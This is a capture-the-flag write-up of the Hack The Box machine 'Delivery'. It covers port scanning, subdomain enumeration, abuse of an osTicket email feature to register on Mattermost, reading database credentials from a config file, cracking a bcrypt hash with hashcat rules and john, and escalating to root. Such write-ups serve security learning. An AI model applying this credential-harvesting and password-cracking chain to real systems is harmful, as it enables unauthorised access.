CTF – HTB – Delivery

And here is another write up at attempting to crack boxes on HTB!

Let’s run an nmap scan.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 09:34 EDT
Nmap scan report for 10.10.10.222
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.84 seconds

With only SSH and a web port open, let’s poke at the web service. Meanwhile we can run a full scan, comprising of all TCP ports.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 09:35 EDT
Nmap scan report for 10.10.10.222
Host is up (0.060s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sat, 17 Apr 2021 07:56:09 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: ybfufx5yptf3fbpwd648s7uxoy
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sat, 17 Apr 2021 13:46:13 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 17 Apr 2021 13:46:13 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8065-TCP:V=7.91%I=7%D=4/17%Time=607AE430%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,DF3,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\
SF:x20bytes\r\nCache-Control:\x20no-cache,\x20max-age=31556926,\x20public\
SF:r\nContent-Length:\x203108\r\nContent-Security-Policy:\x20frame-ancesto
SF:rs\x20'self';\x20script-src\x20'self'\x20cdn\.rudderlabs\.com\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:\x20Sat,\x2017\
SF:x20Apr\x202021\x2007:56:09\x20GMT\r\nX-Frame-Options:\x20SAMEORIGIN\r\n
SF:X-Request-Id:\x20ybfufx5yptf3fbpwd648s7uxoy\r\nX-Version-Id:\x205\.30\.
SF:0\.5\.30\.1\.57fb31b889bf81d99d8af8176d4bbaaa\.false\r\nDate:\x20Sat,\x
SF:2017\x20Apr\x202021\x2013:46:13\x20GMT\r\n\r\n<!doctype\x20html><html\x
SF:20lang=\"en\"><head><meta\x20charset=\"utf-8\"><meta\x20name=\"viewport
SF:\"\x20content=\"width=device-width,initial-scale=1,maximum-scale=1,user
SF:-scalable=0\"><meta\x20name=\"robots\"\x20content=\"noindex,\x20nofollo
SF:w\"><meta\x20name=\"referrer\"\x20content=\"no-referrer\"><title>Matter
SF:most</title><meta\x20name=\"mobile-web-app-capable\"\x20content=\"yes\"
SF:><meta\x20name=\"application-name\"\x20content=\"Mattermost\"><meta\x20
SF:name=\"format-detection\"\x20content=\"telephone=no\"><link\x20re")%r(H
SF:TTPOptions,5B,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDate:\x2
SF:0Sat,\x2017\x20Apr\x202021\x2013:46:13\x20GMT\r\nContent-Length:\x200\r
SF:\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConten
SF:t-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n
SF:400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close
SF:\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nCon
SF:nection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie
SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.89 seconds

Attempting to brute-force directories gave nothing, let’s find if the web server virtual host routes.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     delivery.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2021/04/17 09:52:48 Starting gobuster in DNS enumeration mode
===============================================================

Found: helpdesk.delivery.htb

We have a website running a ticketing system called osTicket. It’s written in PHP, I guess there’s also a MySQL database running in the host. No interesting exploits on exploitDB yet.

The web service giving an unexpected output on the nmap scan at port 8065 reveals itself to be a software called MatterMost. It’s simply an open-source chatting service with additional nuts and bolts, comparable to Slack. A quick look with searchsploitreveals no recent exploits, some of the exploits existing are for an older version. We can create an account on this service, however we never receive the email. We consider that either the mail service is not configured, is configured to only send emails to specific email TLD or can simply send to localhost.

With that in mind, we simply create a ticket on osTicket and get assigned a reply email, so customers can directly reply to the email with their ticket ID. It’s a common feature of ticketing system and I use it to get a valid registration on the MatterMost endpoint. After having an account in this service, we obtain credentials for the server as well as a hint nothing that variants of “PleaseSubscribe!” password are reused multiple times across the systems.

We log in to the server and quickly enumerate the system to find credentials in MatterMost configuration.

┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ ssh maildeliverer@delivery.htb
The authenticity of host 'delivery.htb (10.10.10.222)' can't be established.
ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts.
maildeliverer@delivery.htb's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 17 10:26:56 2021 from 10.10.14.69
maildeliverer@Delivery:~$ 
maildeliverer@Delivery:~$ ls -la
total 32
drwxr-xr-x 3 maildeliverer maildeliverer 4096 Apr 17 10:31 .
drwxr-xr-x 3 root          root          4096 Dec 26 09:01 ..
lrwxrwxrwx 1 root          root             9 Dec 28 07:04 .bash_history -> /dev/null
-rw-r--r-- 1 maildeliverer maildeliverer  220 Dec 26 09:01 .bash_logout
-rw-r--r-- 1 maildeliverer maildeliverer 3526 Dec 26 09:01 .bashrc
drwx------ 4 maildeliverer maildeliverer 4096 Apr 17 10:28 .gnupg
-rw------- 1 maildeliverer maildeliverer   70 Apr 17 10:31 .mysql_history
-rw-r--r-- 1 maildeliverer maildeliverer  807 Dec 26 09:01 .profile
-r-------- 1 maildeliverer maildeliverer   33 Apr 17 10:26 user.txt
maildeliverer@Delivery:~$ id
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
maildeliverer@Delivery:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:e6:8e brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.222/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:e68e/64 scope global dynamic mngtmpaddr 
       valid_lft 85968sec preferred_lft 13968sec
    inet6 fe80::250:56ff:feb9:e68e/64 scope link 
       valid_lft forever preferred_lft forever

[...snip...]
maildeliverer@Delivery:~$ cat /opt/mattermost/config | grep "SqlSettings" -A 15

    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },

We have the password for the MySQL user mmuser, I naturally log in and dump the database in the lookout of some juicy information.

mysql -u mmuser -D mattermost -p

We find a database called Users, we dump it to find the password of root account, encrypted:

SELECT * FROM Users;

[...snip...]

root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO

We use the hint given before and create variations of the reused passwords with hashcat, then proceed to crack it with john!

┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ vim words.txt                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ cat words.txt
PleaseSubscribe
PleaseSubscribe!
Please
Subscribe
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ hashcat --force words.txt -r /usr/share/hashcat/rules/best64.rule --stdout > mutated_words.txt                                                                                                                                                                                                                                         
┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ less mutated_words.txt 
┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ wc mutated_words.txt
 308  308 3574 mutated_words.txt         
┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ john creds_mysql_root --wordlist=./mutated_words.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PleaseSubscribe!21 (root)
1g 0:00:00:01 DONE (2021-04-17 12:48) 0.7874g/s 85.03p/s 85.03c/s 85.03C/s PleaseSubscribe!9..PleaseSubscribea
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Back in the victim machine, cracked credentials gives us root!

maildeliverer@Delivery:~$ su
Password: 
root@Delivery:/home/maildeliverer# 
root@Delivery:/home/maildeliverer# cd /root
root@Delivery:~# ls -la
total 44
drwx------  5 root root 4096 Jan  5 06:39 .
drwxr-xr-x 18 root root 4096 Jan  5 06:06 ..
lrwxrwxrwx  1 root root    9 Dec 28 07:04 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Dec 26 09:33 .cache
drwx------  3 root root 4096 Dec 27 13:41 .gnupg
-rwxr-x---  1 root root  103 Dec 26 11:26 mail.sh
-r--------  1 root root  382 Dec 28 07:02 note.txt
-rw-r-----  1 root root  148 Aug 17  2015 .profile
-rw-r-----  1 root root 1499 Dec 26 10:55 py-smtp.py
-r--------  1 root root   33 Apr 17 12:40 root.txt
drwxr-xr-x  2 root root 4096 Dec 27 14:28 .vim

This was a fairly easy box! Let’s crack more and stay fresh!

Have a good one and thanks for reading!